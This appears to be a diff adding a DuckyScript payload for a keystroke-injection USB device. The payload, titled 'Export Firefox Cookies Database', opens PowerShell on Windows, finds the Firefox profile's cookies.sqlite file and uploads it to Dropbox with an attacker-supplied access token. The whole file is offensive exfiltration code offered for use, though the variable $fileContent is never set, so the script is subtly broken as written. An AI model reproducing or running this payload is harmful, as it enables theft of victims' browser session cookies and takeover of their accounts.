Export_Cookies_From_Firefox

payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt

@@ -0,0 +1,55 @@
+REM ####################################################
+REM #                                                  |
+REM # Title        : Export Firefox Cookies Database   |
+REM # Author       : Aleff                             |
+REM # Version      : 1.0                               |
+REM # Category     : Exfiltration                      |
+REM # Target       : Windows 10-11                     |
+REM #                                                  |
+REM ####################################################
+
+
+REM Requirements:
+REM     - Firefox must be installed
+
+
+REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
+DEFINE DROPBOX_ACCESS_TOKEN "example"
+
+
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 2000
+
+
+REM Get cookies DB path
+STRINGLN
+    $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
+    $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
+
+    $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
+
+END_STRINGLN
+
+REM Setting about exfiltration
+STRING $accessToken = 
+STRING DROPBOX_ACCESS_TOKEN
+ENTER
+
+STRINGLN
+    $authHeader = @{Authorization = "Bearer $accessToken"}
+    $dropboxFilePath = "/cookies_exported.sqlite"
+
+    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+    $headers = @{}
+    $headers.Add("Authorization", "Bearer $accessToken")
+    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+    $headers.Add("Content-Type", "application/octet-stream")
+
+    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
+END_STRINGLN